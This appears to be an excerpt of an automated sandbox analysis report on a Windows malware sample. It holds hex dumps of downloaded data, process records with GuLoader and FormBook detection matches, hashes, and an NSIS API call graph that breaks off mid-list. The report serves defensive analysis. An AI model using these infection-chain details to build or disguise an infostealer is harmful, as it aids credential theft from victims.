                                                                                                                                                                                                                                                              Data Ascii: %n7jIU<nb6JqVj\.Z|FOsy|vB4b9au/fI]Ol#V>p#mlILF@Hm/6}Ty#@Z9#4fBoAul|5tA>xc<YtBP@{AcK]iVRI`c_\u)vQX'7Y
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: b2 6e 4a 24 86 9a 84 79 84 e8 c9 bf d8 7b f8 5f 73 5e 93 c1 e7 62 3f e0 e4 bf 2f e6 a5 57 be d2 fc e3 8e 08 2f eb a4 25 16 e1 5a 29 a5 e6 e8 1d 6d 75 e1 66 28 fa 8a 18 73 5d b6 94 43 fc 93 f2 9d 54 03 40 52 38 fe b4 00 75 7d ec 21 e4 89 b0 55 56 c4 c1 71 22 f9 7f 70 a8 6c ce f5 e7 85 fe e2 a6 94 ea bc 20 5d fb f3 7a 90 5e 83 db 09 e4 b3 10 f4 d7 be 30 1c 05 78 58 7c 19 c1 18 11 ce 91 67 9f c2 52 e0 f8 72 ee 9f 1a b2 69 5c e8 b5 1f 0c 80 83 75 73 5c 2b 9b 24 f7 c1 56 c8 ce 88 61 8c 2e e0 a8 c7 78 37 70 69 40 ba 30 ab 4f f3 27 66 25 2c f1 b4 66 af 1e 61 65 59 4f fd 35 a4 2f 94 f7 2b 37 75 01 b2 c8 23 92 9d 75 f4 e6 cd dc b1 1c d9 2b c9 41 53 d8 bc 17 c9 2a 52 56 19 9d f5 fb 40 42 88 14 16 b6 e4 41 08 ec 28 6b 57 02 88 1c 3b e2 73 0c 0f 97 62 39 96 e1 c7 54
                                                                                                                                                                                                                                                              Data Ascii: nJ$y{_s^b?/W/%Z)muf(s]CT@R8u}!UVq"pl ]z^0xX|gRri\us\+$Va.x7pi@0O'f%,faeYO5/+7u#u+AS*RV@BA(kW;sb9T
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 30 ca 50 93 15 74 a3 a0 43 00 fc a7 a2 df c2 2d 64 c0 bc 6e 73 1f f0 56 a1 aa 3b fe 81 d5 6e e6 63 56 9a ad 56 8f a8 4e 6d fc e9 de 96 d3 da 9f 6f 21 7f d8 ec cc 6c 2b b7 bc 6b 04 fa 04 81 87 70 b3 8f c4 fd f6 d1 df 88 2f cd 18 53 8d 3d fa bb d8 27 3d 2b 11 46 24 51 ad 19 ed 62 09 ed 1f fd 0d e2 65 28 7f 3f 7e 88 a4 2a c9 2c 51 bf f1 78 c2 34 38 9e e7 78 05 61 48 19 de 21 40 96 cf 15 8f 98 f0 92 25 57 ba e6 07 3f 77 43 07 b5 c7 64 66 42 e9 da 58 fb 39 3a 98 d3 be ad 85 c8 ff 94 de 41 02 87 ff ba 2e e2 de d2 75 e3 e5 2d 5b 5c 10 44 ac 44 00 40 28 f1 7d ce 7f 6b 30 8e 4d 3a ec e8 e0 6c 03 52 97 83 28 96 ac 11 ee 00 0f e7 04 f3 0e e2 2f 24 5c 6d 6e 43 3b 1e 0b 42 72 31 02 d6 14 7e a8 89 74 cb 89 65 db 3f 29 65 7b 36 6e 1c 55 0d 06 a2 a5 ea 95 89 64 f4 dd d5
                                                                                                                                                                                                                                                              Data Ascii: 0PtC-dnsV;ncVVNmo!l+kp/S='=+F$Qbe(?~*,Qx48xaH!@%W?wCdfBX9:A.u-[\DD@(}k0M:lR(/$\mnC;Br1~te?)e{6nUd
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 96 2a d0 6f 6b 57 91 8c cd 47 cb 48 dc d0 0e a0 7c 56 34 94 5e 26 aa 33 30 c0 48 87 ab ef 32 83 60 d7 67 51 91 29 1a 47 0a 90 3c 69 ed 17 2a 9a 1f d8 9a c8 41 1e ba 05 05 5e d3 09 0b c7 a0 55 68 12 b8 de ec f9 36 8e 22 dd f5 0d d3 0a b3 53 ad 18 55 87 78 59 de c4 05 89 be 5d 67 27 eb b5 91 fd 77 ce 93 f5 d3 23 af 1c 50 15 48 5b 01 9b 58 c5 51 f2 51 6d 0b 50 21 f9 5f 0d 75 d6 37 a1 92 84 a9 4b ae c9 b8 4b 00 b4 9d 61 80 13 e9 55 eb c4 59 3e cf c5 40 2c 0e 7f 27 a0 74 5e 19 40 84 ed b9 f4 c3 3f c4 70 c8 89 1d 62 d5 c8 c2 6e 28 69 88 f5 18 8f 31 f2 a3 70 3e 0a cf ee 01 fd 1f 4b 4e 9b 5a 65 84 e2 95 40 44 e2 ee 9c 6f 22 7a 6f 77 25 0b 93 b6 97 d6 20 b4 03 70 9f c4 67 43 80 1e 60 c8 53 ea 71 3c 43 d5 1e 46 c0 93 66 43 e0 9f a3 bd 5a ea d7 bc db 86 64 0a 9f 2d
                                                                                                                                                                                                                                                              Data Ascii: *okWGH|V4^&30H2`gQ)G<i*A^Uh6"SUxY]g'w#PH[XQQmP!_u7KKaUY>@,'t^@?pbn(i1p>KNZe@Do"zow% pgC`Sq<CFfCZd-
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: ab af 4c 7b d4 ed 24 2c 0f ca b6 34 a6 f2 7b cd 76 01 66 ad b7 84 47 5a 97 ea 9f ef 84 3c f2 ed e0 6d 3f ec 5f 2c 8d fe d9 22 cc f1 1b 67 bc f0 fa a6 9e a8 88 d1 8d 4a 56 17 dc 68 6e 2d cb e6 e7 62 b7 b8 c2 b4 e0 5c a8 1d 41 15 ec 25 a4 f8 91 4d 11 18 a6 5e 14 07 98 65 6d 74 24 60 ce 16 63 46 fb 18 f2 71 dc b4 d9 bb 87 05 e0 f5 6a c3 eb 3f 89 77 f7 68 f0 b7 93 af 38 a6 aa 21 38 e1 a0 89 a1 e0 34 41 13 5d e5 6c 5c 1a bf c0 09 df 77 23 9a 60 a7 71 28 22 96 a8 7e f9 68 7e 0d a1 ab fc 26 38 9a 4e d9 aa 02 99 e5 d3 50 1d 36 13 38 66 ea cd ba 17 c3 21 7d 0d e7 98 cb f4 37 d3 97 c3 b2 b3 b1 30 f0 d5 8f e5 2d 8d cc da 58 6c 39 68 51 a2 40 ce ee d0 8b 04 fc 3e 5c 84 99 51 0a 6a da 80 8a 98 5e b8 18 68 b0 22 13 a1 93 77 83 9c bf 39 1f 6e c3 5f e3 37 b8 38 91 6c 41
                                                                                                                                                                                                                                                              Data Ascii: L{$,4{vfGZ<m?_,"gJVhn-b\A%M^emt$`cFqj?wh8!84A]l\w#`q("~h~&8NP68f!}70-Xl9hQ@>\Qj^h"w9n_78lA
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 38 55 02 2d c0 fb c9 21 d0 bf 00 8a 28 68 12 ec d3 5f 2d 0c 21 43 b6 8e 34 71 fe 13 da 29 d1 a2 2f a8 94 7e cf a4 cc bf ab 40 aa ab 78 b2 bb 5e 2a a0 cd db dc 66 72 e3 e3 f9 42 64 f2 06 fa 29 14 0d f9 d4 68 e4 5e 11 9a 55 54 9c cd ab d6 c1 0f 8e f8 7b 63 6c d6 a3 5b 2c cf 28 16 53 3f 77 3d 68 82 4f 8d 47 4c 00 0d 75 b6 7d 57 40 1c 74 05 38 ed 2d 45 0c fe 10 3f 70 03 ca 03 27 b9 ed 32 fd bd 50 19 01 17 7e 3e 11 a3 95 66 10 23 45 1f cc 4d c4 29 38 d9 32 4b 9e e0 e8 b3 da 12 93 28 b1 aa 98 08 11 dd 4a 7f c9 f4 27 85 30 ee 9a a8 9b 23 c8 22 6c 4c 47 46 37 73 83 4f 05 db 5a cb 24 2c a3 a1 73 66 39 f2 2b 3a e4 58 16 e3 1c 72 cf 04 43 b5 6d 74 d3 59 a3 a5 cb 40 a7 1e 91 cc c0 96 b4 0b 36 5b 98 d0 91 a5 de 26 39 28 e8 a0 00 a9 1d b9 dc 30 57 3a 7d c9 a4 68 3a 9a
                                                                                                                                                                                                                                                              Data Ascii: 8U-!(h_-!C4q)/~@x^*frBd)h^UT{cl[,(S?w=hOGLu}W@t8-E?p'2P~>f#EM)82K(J'0#"lLGF7sOZ$,sf9+:XrCmtY@6[&9(0W:}h:



                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:07:34:13
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\ImBm40hNZ2.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'094'223 bytes
                                                                                                                                                                                                                                                              MD5 hash:D4C7AAB6ED29A31A27712F4536614667
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.16987895895.00000000034AB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:07:34:50
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\ImBm40hNZ2.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'094'223 bytes
                                                                                                                                                                                                                                                              MD5 hash:D4C7AAB6ED29A31A27712F4536614667
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                              Start time:07:35:19
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe"
                                                                                                                                                                                                                                                              Imagebase:0x320000
                                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:07:35:21
                                                                                                                                                                                                                                                              Start date:09/10/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                                                                                                                                                                                                              Imagebase:0xa90000
                                                                                                                                                                                                                                                              File size:17'408 bytes
                                                                                                                                                                                                                                                              MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:moderate
Has exited:false

Target ID:6
Start time:07:35:34
Start date:09/10/2024
Path:C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe"
Imagebase:0x320000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:7
Start time:07:35:47
Start date:09/10/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff6fc450000
File size:597'432 bytes
MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Execution Graph

Execution Coverage:17.8%
Dynamic/Decrypted Code Coverage:15.7%
Signature Coverage:20.2%
Total number of Nodes:1469
Total number of Limit Nodes:35
SendMessageA 4717->4725 4718 404e62 CallWindowProcA 4722 404e10 4718->4722 4719->4722 4721->4718 4730 4047c7 4721->4730 4724->4718 4726 4047a6 SendMessageA 4725->4726 4727 40476a GetMessagePos ScreenToClient SendMessageA 4725->4727 4729 40479e 4726->4729 4728 4047a3 4727->4728 4727->4729 4728->4726 4729->4721 4739 405b91 lstrcpynA 4730->4739 4732 4047da 4740 405aef wsprintfA 4732->4740 4734 4047e4 4735 40140b 2 API calls 4734->4735 4736 4047ed 4735->4736 4741 405b91 lstrcpynA 4736->4741 4738 4047f4 4738->4724 4739->4732 4740->4734 4741->4738 4742 4019f1 4743 4029fd 18 API calls 4742->4743 4744 4019fa ExpandEnvironmentStringsA 4743->4744 4745 401a0e 4744->4745 4747 401a21 4744->4747 4746 401a13 lstrcmpA 4745->4746 4745->4747 4746->4747 4748 404276 4749 404286 4748->4749 4750 4042ac 4748->4750 4752 403e7f 19 API calls 4749->4752 4751 403ee6 8 API calls 4750->4751 4753 4042b8 4751->4753 4754 404293 SetDlgItemTextA 4752->4754 4754->4750 4755 10001637 4756 10001666 4755->4756 4757 10001a86 20 API calls 4756->4757 4758 1000166d 4757->4758 4759 10001680 4758->4759 4760 10001674 4758->4760 4762 100016a7 4759->4762 4763 1000168a 4759->4763 4761 10001278 2 API calls 4760->4761 4766 1000167e 4761->4766 4764 100016d1 4762->4764 4765 100016ad 4762->4765 4767 100014ff 3 API calls 4763->4767 4769 100014ff 3 API calls 4764->4769 4768 10001576 3 API calls 4765->4768 4770 1000168f 4767->4770 4771 100016b2 4768->4771 4769->4766 4772 10001576 3 API calls 4770->4772 4773 10001278 2 API calls 4771->4773 4774 10001695 4772->4774 4776 100016b8 GlobalFree 4773->4776 4775 10001278 2 API calls 4774->4775 4777 1000169b GlobalFree 4775->4777 4776->4766 4778 100016cc GlobalFree 4776->4778 4777->4766 4778->4766 4779 401c78 4780 4029e0 18 API calls 4779->4780 4781 401c7e IsWindow 4780->4781 4782 4019e1 4781->4782 4783 4047f9 GetDlgItem GetDlgItem 4784 40484b 7 API calls 4783->4784 4796 404a63 4783->4796 4785 4048e1 SendMessageA 4784->4785 4786 4048ee DeleteObject 4784->4786 4785->4786 4787 4048f7 
4786->4787 4789 40492e 4787->4789 4790 405bb3 18 API calls 4787->4790 4788 404b47 4792 404bf3 4788->4792 4798 404a56 4788->4798 4803 404ba0 SendMessageA 4788->4803 4791 403e7f 19 API calls 4789->4791 4793 404910 SendMessageA SendMessageA 4790->4793 4797 404942 4791->4797 4794 404c05 4792->4794 4795 404bfd SendMessageA 4792->4795 4793->4787 4805 404c17 ImageList_Destroy 4794->4805 4806 404c1e 4794->4806 4812 404c2e 4794->4812 4795->4794 4796->4788 4801 404747 5 API calls 4796->4801 4817 404ad4 4796->4817 4802 403e7f 19 API calls 4797->4802 4799 403ee6 8 API calls 4798->4799 4804 404de9 4799->4804 4800 404b39 SendMessageA 4800->4788 4801->4817 4818 404950 4802->4818 4803->4798 4808 404bb5 SendMessageA 4803->4808 4805->4806 4810 404c27 GlobalFree 4806->4810 4806->4812 4807 404d9d 4807->4798 4813 404daf ShowWindow GetDlgItem ShowWindow 4807->4813 4809 404bc8 4808->4809 4820 404bd9 SendMessageA 4809->4820 4810->4812 4811 404a24 GetWindowLongA SetWindowLongA 4814 404a3d 4811->4814 4812->4807 4827 4047c7 4 API calls 4812->4827 4828 404c69 4812->4828 4813->4798 4815 404a43 ShowWindow 4814->4815 4816 404a5b 4814->4816 4834 403eb4 SendMessageA 4815->4834 4835 403eb4 SendMessageA 4816->4835 4817->4788 4817->4800 4818->4811 4819 40499f SendMessageA 4818->4819 4821 404a1e 4818->4821 4825 4049db SendMessageA 4818->4825 4826 4049ec SendMessageA 4818->4826 4819->4818 4820->4792 4821->4811 4821->4814 4822 404cad 4829 404d73 InvalidateRect 4822->4829 4833 404d21 SendMessageA SendMessageA 4822->4833 4825->4818 4826->4818 4827->4828 4828->4822 4830 404c97 SendMessageA 4828->4830 4829->4807 4831 404d89 4829->4831 4830->4822 4836 404665 4831->4836 4833->4822 4834->4798 4835->4796 4837 40467f 4836->4837 4838 405bb3 18 API calls 4837->4838 4839 4046b4 4838->4839 4840 405bb3 18 API calls 4839->4840 4841 4046bf 4840->4841 4842 405bb3 18 API calls 4841->4842 4843 4046f0 lstrlenA wsprintfA SetDlgItemTextA 4842->4843 4843->4807 4844 1000103d 4845 1000101b 8 API calls 4844->4845 4846 10001056 
4845->4846 4847 4014fe 4848 401506 4847->4848 4850 401519 4847->4850 4849 4029e0 18 API calls 4848->4849 4849->4850 4851 40227f 4852 4029fd 18 API calls 4851->4852 4853 402290 4852->4853 4854 4029fd 18 API calls 4853->4854 4855 402299 4854->4855 4856 4029fd 18 API calls 4855->4856 4857 4022a3 GetPrivateProfileStringA 4856->4857 4858 4045ff 4859 40462b 4858->4859 4860 40460f 4858->4860 4861 404631 SHGetPathFromIDListA 4859->4861 4862 40465e 4859->4862 4869 405389 GetDlgItemTextA 4860->4869 4865 404641 4861->4865 4866 404648 SendMessageA 4861->4866 4864 40461c SendMessageA 4864->4859 4867 40140b 2 API calls 4865->4867 4866->4862 4867->4866 4869->4864 4870 401000 4871 401037 BeginPaint GetClientRect 4870->4871 4874 40100c DefWindowProcA 4870->4874 4872 4010f3 4871->4872 4875 401073 CreateBrushIndirect FillRect DeleteObject 4872->4875 4876 4010fc 4872->4876 4877 401179 4874->4877 4875->4872 4878 401102 CreateFontIndirectA 4876->4878 4879 401167 EndPaint 4876->4879 4878->4879 4880 401112 6 API calls 4878->4880 4879->4877 4880->4879 4881 402602 4882 402892 4881->4882 4883 402609 4881->4883 4884 40260f FindClose 4883->4884 4884->4882 4885 402683 4886 4029fd 18 API calls 4885->4886 4887 402691 4886->4887 4888 4026a7 4887->4888 4889 4029fd 18 API calls 4887->4889 4890 4057fd 2 API calls 4888->4890 4889->4888 4891 4026ad 4890->4891 4911 405822 GetFileAttributesA CreateFileA 4891->4911 4893 4026ba 4894 402763 4893->4894 4895 4026c6 GlobalAlloc 4893->4895 4898 40276b DeleteFileA 4894->4898 4899 40277e 4894->4899 4896 40275a CloseHandle 4895->4896 4897 4026df 4895->4897 4896->4894 4912 403097 SetFilePointer 4897->4912 4898->4899 4901 4026e5 4902 403081 ReadFile 4901->4902 4903 4026ee GlobalAlloc 4902->4903 4904 402732 WriteFile GlobalFree 4903->4904 4905 4026fe 4903->4905 4907 402e62 33 API calls 4904->4907 4906 402e62 33 API calls 4905->4906 4910 40270b 4906->4910 4908 402757 4907->4908 4908->4896 4909 402729 GlobalFree 4909->4904 4910->4909 4911->4893 4912->4901 4913 402784 
4914 4029e0 18 API calls 4913->4914 4915 40278a 4914->4915 4916 4027c5 4915->4916 4917 4027ae 4915->4917 4922 402663 4915->4922 4919 4027db 4916->4919 4920 4027cf 4916->4920 4918 4027b3 4917->4918 4926 4027c2 4917->4926 4927 405b91 lstrcpynA 4918->4927 4923 405bb3 18 API calls 4919->4923 4921 4029e0 18 API calls 4920->4921 4921->4926 4923->4926 4926->4922 4928 405aef wsprintfA 4926->4928 4927->4922 4928->4922 4117 401705 4118 4029fd 18 API calls 4117->4118 4119 40170c SearchPathA 4118->4119 4120 4027bd 4119->4120 4121 401727 4119->4121 4121->4120 4123 405b91 lstrcpynA 4121->4123 4123->4120 4340 401389 4342 401390 4340->4342 4341 4013fe 4342->4341 4343 4013cb MulDiv SendMessageA 4342->4343 4343->4342 4929 40280a 4930 4029e0 18 API calls 4929->4930 4931 402810 4930->4931 4932 402841 4931->4932 4933 402663 4931->4933 4935 40281e 4931->4935 4932->4933 4934 405bb3 18 API calls 4932->4934 4934->4933 4935->4933 4937 405aef wsprintfA 4935->4937 4937->4933 4938 40218a 4939 4029fd 18 API calls 4938->4939 4940 402190 4939->4940 4941 4029fd 18 API calls 4940->4941 4942 402199 4941->4942 4943 4029fd 18 API calls 4942->4943 4944 4021a2 4943->4944 4945 405e95 2 API calls 4944->4945 4946 4021ab 4945->4946 4947 4021bc lstrlenA lstrlenA 4946->4947 4948 4021af 4946->4948 4950 404e7c 25 API calls 4947->4950 4949 404e7c 25 API calls 4948->4949 4952 4021b7 4948->4952 4949->4952 4951 4021f8 SHFileOperationA 4950->4951 4951->4948 4951->4952 4953 40220c 4954 402226 4953->4954 4955 402213 4953->4955 4956 405bb3 18 API calls 4955->4956 4957 402220 4956->4957 4958 4053a5 MessageBoxIndirectA 4957->4958 4958->4954 4959 401490 4960 404e7c 25 API calls 4959->4960 4961 401497 4960->4961 4962 100015d0 4963 100014d8 4 API calls 4962->4963 4966 100015e8 4963->4966 4964 1000162e GlobalFree 4965 10001603 4965->4964 4966->4964 4966->4965 4967 1000161a VirtualFree 4966->4967 4967->4964 4358 401b11 4359 401b62 4358->4359 4360 401b1e 4358->4360 4361 401b66 4359->4361 4362 401b8b GlobalAlloc 4359->4362 4363 
401ba6 4360->4363 4366 401b35 4360->4366 4372 402226 4361->4372 4379 405b91 lstrcpynA 4361->4379 4365 405bb3 18 API calls 4362->4365 4364 405bb3 18 API calls 4363->4364 4363->4372 4367 402220 4364->4367 4365->4363 4377 405b91 lstrcpynA 4366->4377 4373 4053a5 MessageBoxIndirectA 4367->4373 4370 401b78 GlobalFree 4370->4372 4371 401b44 4378 405b91 lstrcpynA 4371->4378 4373->4372 4375 401b53 4380 405b91 lstrcpynA 4375->4380 4377->4371 4378->4375 4379->4370 4380->4372 4968 403f93 lstrcpynA lstrlenA 4409 401595 4410 4029fd 18 API calls 4409->4410 4411 40159c SetFileAttributesA 4410->4411 4412 4015ae 4411->4412 4969 401c95 4970 4029e0 18 API calls 4969->4970 4971 401c9c 4970->4971 4972 4029e0 18 API calls 4971->4972 4973 401ca4 GetDlgItem 4972->4973 4974 4024cb 4973->4974 4975 10001058 4976 1000123b 3 API calls 4975->4976 4978 10001074 4976->4978 4977 100010dc 4978->4977 4979 100014d8 4 API calls 4978->4979 4980 10001091 4978->4980 4979->4980 4981 100014d8 4 API calls 4980->4981 4982 100010a1 4981->4982 4983 100010b1 4982->4983 4984 100010a8 GlobalSize 4982->4984 4985 100010b5 GlobalAlloc 4983->4985 4986 100010c6 4983->4986 4984->4983 4987 100014ff 3 API calls 4985->4987 4988 100010d1 GlobalFree 4986->4988 4987->4986 4988->4977 4464 402519 4465 4029e0 18 API calls 4464->4465 4466 402523 4465->4466 4467 40589a ReadFile 4466->4467 4468 40258f 4466->4468 4471 40259f 4466->4471 4472 40258d 4466->4472 4467->4466 4473 405aef wsprintfA 4468->4473 4470 4025b5 SetFilePointer 4470->4472 4471->4470 4471->4472 4473->4472 4989 100029db 4990 100029f3 4989->4990 4991 10001551 2 API calls 4990->4991 4992 10002a0e 4991->4992 4484 40231c 4485 402322 4484->4485 4486 4029fd 18 API calls 4485->4486 4487 402334 4486->4487 4488 4029fd 18 API calls 4487->4488 4489 40233e RegCreateKeyExA 4488->4489 4490 402368 4489->4490 4493 402663 4489->4493 4491 402380 4490->4491 4492 4029fd 18 API calls 4490->4492 4495 4029e0 18 API calls 4491->4495 4497 40238c 4491->4497 4494 402379 lstrlenA 4492->4494 
4494->4491 4495->4497 4496 4023a7 RegSetValueExA 4499 4023bd RegCloseKey 4496->4499 4497->4496 4498 402e62 33 API calls 4497->4498 4498->4496 4499->4493 4993 40261c 4994 402637 4993->4994 4995 40261f 4993->4995 4996 4027bd 4994->4996 4999 405b91 lstrcpynA 4994->4999 4997 40262c FindNextFileA 4995->4997 4997->4994 4999->4996 5000 100010e0 5001 1000110e 5000->5001 5002 1000123b 3 API calls 5001->5002 5006 1000111e 5002->5006 5003 100011c4 GlobalFree 5004 100012bf 2 API calls 5004->5006 5005 1000123b 3 API calls 5005->5006 5006->5003 5006->5004 5006->5005 5007 100011c3 5006->5007 5008 100011ea GlobalFree 5006->5008 5009 10001278 2 API calls 5006->5009 5010 10001155 GlobalAlloc 5006->5010 5011 100012e8 lstrcpyA 5006->5011 5012 100011b1 GlobalFree 5006->5012 5007->5003 5008->5006 5009->5012 5010->5006 5011->5006 5012->5006 5013 4016a1 5014 4029fd 18 API calls 5013->5014 5015 4016a7 GetFullPathNameA 5014->5015 5017 4016be 5015->5017 5022 4016df 5015->5022 5016 4016f3 GetShortPathNameA 5018 402892 5016->5018 5019 405e95 2 API calls 5017->5019 5017->5022 5020 4016cf 5019->5020 5020->5022 5023 405b91 lstrcpynA 5020->5023 5022->5016 5022->5018 5023->5022 4124 401d26 GetDC GetDeviceCaps 4132 4029e0 4124->4132 4126 401d44 MulDiv ReleaseDC 4127 4029e0 18 API calls 4126->4127 4128 401d63 4127->4128 4129 405bb3 18 API calls 4128->4129 4130 401d9c CreateFontIndirectA 4129->4130 4131 4024cb 4130->4131 4133 405bb3 18 API calls 4132->4133 4134 4029f4 4133->4134 4134->4126 4344 40172c 4345 4029fd 18 API calls 4344->4345 4346 401733 4345->4346 4347 405851 2 API calls 4346->4347 4348 40173a 4347->4348 4349 405851 2 API calls 4348->4349 4349->4348 4350 401dac 4351 4029e0 18 API calls 4350->4351 4352 401db2 4351->4352 4353 4029e0 18 API calls 4352->4353 4354 401dbb 4353->4354 4355 401dc2 ShowWindow 4354->4355 4356 401dcd EnableWindow 4354->4356 4357 402892 4355->4357 4356->4357 5024 401eac 5025 4029fd 18 API calls 5024->5025 5026 401eb3 5025->5026 5027 405e95 2 API calls 5026->5027 5028 
